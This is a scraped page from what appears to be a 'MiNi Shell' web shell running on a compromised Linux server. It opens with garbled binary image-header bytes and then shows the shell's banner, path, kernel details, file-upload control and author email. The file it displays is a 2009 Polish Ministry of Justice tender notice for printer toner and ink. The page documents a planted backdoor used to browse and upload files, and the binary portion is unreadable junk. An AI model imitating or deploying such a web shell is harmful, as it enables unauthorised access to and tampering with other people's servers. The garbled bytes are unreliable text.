JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090714/237904-N-2009.html

<p class="kh_header"><b>Warszawa: Zakup materiałów eksploatacyjnych do drukarek oraz urządzeń wielofunkcyjnych</b><br>
<b>Numer ogłoszenia: 237904 - 2009; data zamieszczenia: 14.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Sprawiedliwości , Al. Ujazdowskie 11, 00-950 Warszawa, woj. mazowieckie, tel. 022 521 27 73,5212888, 5212214, faks 022 6289785.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ms.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów eksploatacyjnych do drukarek oraz urządzeń wielofunkcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakup  fabrycznie nowych  tonerów i tuszy do drukarek oraz urządzeń wielofunkcyjnych. Szczegółowy zakres przedmiotu zamówienia zawiera załącznik nr 1 do umowy  WYKAZ MATERIAŁÓW EKSPLOATACYJNYCH .
Wykonawca, którego oferta zostanie wybrana w terminie 2 dni od podania informacji 
o wyborze oferty, dostarczy Zamawiającemu wypełniony i podpisany przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy formularz WYKAZ MATERIAŁÓW EKSPLOATACYJNYCH. Wykonawca jest zobowiązany do wypełnienia w/w formularza w tym kolumny V pt. Nazwa producenta artykułu oraz numer katalogowy lub symbol handlowy nadany przez producenta oraz wydajność podana zgodnie z normą ISO/IEC 24711 dla tuszy lub równoważną normą oraz ISO/IEC 19752/19798 dla tonerów lub równoważną normą. W przypadku zaoferowania produktów równoważnych wykonawca wraz z w/w Wykazem materiałów eksploatacyjnych dostarczy zamawiającemu karty charakterystyki bezpieczeństwa oddzielnie dla każdego wymienionego w tym wykazie asortymentu. 
	Karty charakterystyk bezpieczeństwa należy załączyć jako wydruki ze strony internetowej producenta danego rodzaju materiału eksploatacyjnego, podpisane przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy lub  kopie w/w kart poświadczone za zgodność z oryginałem przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy.
2.	Zamawiający dopuszcza materiały (produkty) równoważne. Za produkt równoważny Zamawiający  rozumie produkt  kompatybilny ze sprzętem, do którego jest zamówiony (tj. że równoważne kasety z tonerem nie powodują ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku opisanych w warunkach technicznych producenta sprzętu, pełna kompatybilność z oprogramowaniem drukarki, informowanie o liczbie wydrukowanych stron oraz poziomie zużycia tonera), o parametrach takich samych bądź lepszych (pojemność tuszu/tonera, wydajność i jakość wydruku) w stosunku do typu zamawianego produktu fabrycznie nowego (nowo wytworzonego w całości), pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony. Produkt równoważny nie może być produktem regenerowanym i nie może być poddany procesowi ponownego napełniania. Wszystkie elementy wchodzące w skład materiałów eksploatacyjnych muszą być fabrycznie nowe, nieregenerowane, nierefabrykowane, niewchodzące wcześniej (pierwotnie) w całości, jak również w części, w skład innych materiałów. W przypadku zaoferowania produktu równoważnego przed podpisaniem umowy, na Wykonawcy spoczywa obowiązek wykazania, że zaoferowane materiały eksploatacyjne do drukarek oraz urządzeń wielofunkcyjnych są równoważne w stosunku do produktów określonych przez Zamawiającego (art. 30 ust. 5 ustawy - Prawo zamówień publicznych, zwanej dalej ustawą). Stosowanie materiałów eksploatacyjnych nie może powodować uszkodzeń, awarii eksploatowanego sprzętu. Materiały równoważne muszą posiadać karty charakterystyki bezpieczeństwa materiałów eksploatacyjnych przygotowane zgodnie z wymogami Dyrektywy Unii Europejskiej 91/155/EEC wraz z poprawkami 2001/58/EC..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
1.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie,
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Zamawiający nie opisuje, nie wyznacza szczegółowego warunku 
w tym zakresie;
1.4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 
2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa powyżej na podstawie załączonych do wniosku o dopuszczenie do udziału w licytacji elektronicznej oświadczenia o spełnieniu warunków udziału w postępowaniu i dokumentów żądanych przez Zamawiającego, potwierdzających spełnianie tych warunków. Wykonawcy niespełniający warunków zostaną przez Zamawiającego wykluczeni z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. 	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Zamawiający żąda złożenia wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej, który stanowi załącznik nr 1 do ogłoszenia, następujących dokumentów: 
a) 	oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy zgodnie ze wzorem określonym w załączniku nr 2 do ogłoszenia  - oryginał podpisany przez osobę/osoby uprawnioną/uprawnione do    reprezentowania Wykonawcy,

Zamawiający zaleca odpowiednie skreślenie w formularzu oświadczenia w zakresie dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub w zakresie przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W przypadku złożenia oświadczenia bez skreśleń i nie załączenia do wniosku o dopuszczenie do udziału w licytacji elektronicznej pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Zamawiający uzna, iż Wykonawca dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.

b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego - oryginał lub kopia poświadczona za zgodność z oryginałem przez osobę/osoby uprawnioną/uprawnione do  reprezentowania Wykonawcy.

Ponadto do wniosku o dopuszczenie do udziału w niniejszym postępowaniu Wykonawcy muszą załączyć:
a)	Pełnomocnictwo do reprezentowania wykonawcy - oryginał dokumentu lub kopia (odpis) notarialnie poświadczona - jeśli dokumenty potwierdzające spełnienie warunków udziału w postępowaniu lub wniosek o dopuszczenie do udziału 
w licytacji, zostaną podpisane przez osoby inne niż wskazane w odpisie z właściwego rejestru lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl/</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://www.ms.gov.pl zakładka zamówienia publiczne</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. 	Wymagania formalne: - z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy, którzy zarejestrowali się w systemie pod adresem http://licytacje.uzp.gov.pl. - Wykonawca. W związku z powyższym Wykonawcy dopuszczeni do udziału w licytacji i zaproszeni do składania ofert,  chcący wziąć udział w licytacji są obowiązani do dokonania uprzedniej rejestracji, na ww. platformie licytacyjnej, o ile nie są jeszcze zarejestrowani. Powyższej rejestracji Wykonawca powinien dokonać przed wysłaniem wniosku o dopuszczenie do udziału w licytacji (przed wpisaniem loginu w załączniku nr 2 należy się zalogować w systemie i sprawdzić czy system go przyjmie). Jeżeli system przyjmie login należy go wpisać do oświadczenia o loginie i wraz z wnioskiem przesłać do Zamawiającego.  W przypadku podania przez Wykonawcę niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej, Wykonawca zobowiązany jest do jego przekazania najpóźniej dzień przed terminem otwarcia licytacji. W przypadku nie dochowania w/w terminu bądź nie przekazania loginu wykonawca nie będzie brał udziału w licytacji.

2. Wymagania techniczne: Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne określone przez producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej, 
z zainstalowaną jedną z w/w przeglądarek lub przeglądarką równoważną, podłączony do sieci Internet..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Licytacja jednoetapowa. Zamawiający i wykonawcy od momentu otwarcia do momentu zamknięcia licytacji przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną.
2. W toku licytacji elektronicznej wykonawcy składają kolejne korzystniejsze oferty (postąpienia) w postaci elektronicznej, podlegające automatycznej klasyfikacji na podstawie ceny. Możliwość złożenia oferty (postąpienia) istnieje od otwarcia licytacji do jej zamknięcia. 
3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 
4. W toku licytacji Wykonawcy składają oferty z ceną brutto za cały przedmiot zamówienia (zwaną dalej ceną oferty), wyrażoną w złotych. W/w cena oferty obejmuje wszelkie koszty związane z realizacją przedmiotu umowy, w tym koszt opakowania, dostarczenia, ubezpieczenia na czas transportu oraz wszelkie naliczone cła i podatki, w tym podatek od towarów i usług VAT.
5. Zamawiający przyjął za minimalne postąpienie wartość 500,00 zł. 
6. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców. 
7. Informacje dotyczące Wykonawcy (tj. nazwę (firmę) oraz adres), którego ofertę wybrano w toku licytacji zostaną podane na stronie internetowej Zamawiającego tj. http://www.ms.gov.pl zakładka zamówienia publiczne.
8. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto za cały przedmiot zamówienia. 
9. Cena wywoławcza 488 000,00 zł brutto..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">45 minut</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 22.07.2009 godzina 12:00, miejsce: Ministerstwo Sprawiedliwości, 00-950 Warszawa, Al. Ujazdowskie 11, Sekretariat Biura Dyrektora Generalnego, pokój nr 517.</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od dnia przekazania wykonawcom zaproszenia do składania ofert, godz. 12:00.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> w dniu otwarcia, o godz. 12:45..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> Czas trwania licytacji 45 minut. Licytacja zostanie zamknięta o godz. 12:45..</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. 	Wniosek o dopuszczenie w licytacji elektronicznej wraz z wymaganymi dokumentami oświadczeniem i loginem, Wykonawca składa w formie pisemnej, w zamkniętym opakowaniu na adres Zamawiającego: 
Ministerstwo Sprawiedliwości, 
Al. Ujazdowskie 11, 
00-950 Warszawa, 
Sekretariat Biura Dyrektora Generalnego
wraz z dopiskiem:  
wniosek o dopuszczenie do udziału w licytacji elektronicznej na zakup materiałów eksploatacyjnych do drukarek oraz urządzeń wielofunkcyjnych, BDG-II-3826-01/09 termin składania do dnia 22.07.2009r. do godz. 12.00
oraz zawierającym adres Wykonawcy.
a) w przypadku złożenia wniosku o dopuszczenie do udziału w licytacji elektronicznej po terminie, Zamawiający niezwłocznie zawiadomi o tym wykonawcę i wniosek nie będzie oceniany pod względem spełnienia przez Wykonawcę warunków udziału w przedmiotowym postępowaniu. Tym samym Wykonawca nie zostanie zaproszony do składania ofert.
2. Wykonawca, którego oferta zostanie wybrana w terminie 2 dni od podania informacji o wyborze oferty, dostarczy Zamawiającemu wypełniony i podpisany przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy formularz WYKAZ MATERIAŁÓW EKSPLOATACYJNYCH. Wykonawca jest zobowiązany do wypełnienia w/w formularza w tym kolumny V pt. Nazwa producenta artykułu oraz numer katalogowy lub symbol handlowy nadany przez producenta oraz wydajność podana zgodnie z normą ISO/IEC 24711 dla tuszy lub równoważną normą oraz ISO/IEC 19752/19798 dla tonerów lub równoważną normą. 
W przypadku zaoferowania produktów równoważnych wykonawca wraz z w/w Wykazem materiałów eksploatacyjnych dostarczy zamawiającemu karty charakterystyki bezpieczeństwa oddzielnie dla każdego wymienionego w tym wykazie asortymentu. 
Karty charakterystyk bezpieczeństwa należy załączyć jako wydruki ze strony internetowej producenta danego rodzaju materiału eksploatacyjnego, podpisane przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy lub kopie w/w kart poświadczone za zgodność z oryginałem przez osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy.
3. Zamawiający zawrze umowę z wykonawcą, który zaoferował najniższą cenę w toku licytacji wg wzoru, który stanowi załącznik nr 3 do ogłoszenia, z zastrzeżeniem zawartym w w/w pkt 2 i który w dniu podpisania umowy dostarczy Zamawiającemu szczegółową wycenę materiałów eksploatacyjnych. Suma cen jednostkowych w formularzu musi odpowiadać  zaoferowanej w licytacji cenie brutto oferty za cały przedmiot zamówienia.
4. Zamawiający nie żąda wniesienia zabezpieczenia należytego wykonania umowy.
5. Dopuszcza się składanie wniosku o dopuszczenie do udziału w licytacji  przez dwóch lub więcej Wykonawców, pod warunkiem, że będzie spełniać następujące wymagania:
5.1	Wykonawcy występujący wspólnie, w szczególności konsorcja, muszą zgodnie 
z art. 23 ust. 2 ustawy ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.2	Wykonawcy występujący wspólnie muszą załączyć do wniosku o dopuszczenie do udziału w licytacji pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - oryginał dokumentu lub kopia (odpis) notarialnie poświadczona.
5.3	Wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej muszą być załączone dokumenty, o których mowa w sekcji III.2) niniejszego ogłoszenia.
5.4	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców występujących wspólnie.
5.5	Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
7. Osobami uprawnionymi do kontaktu z wykonawcami jest p. Małgorzata Filipek - tel. 022/52-12-773.

Creat By MiNi SheLL
Email: jattceo@gmail.com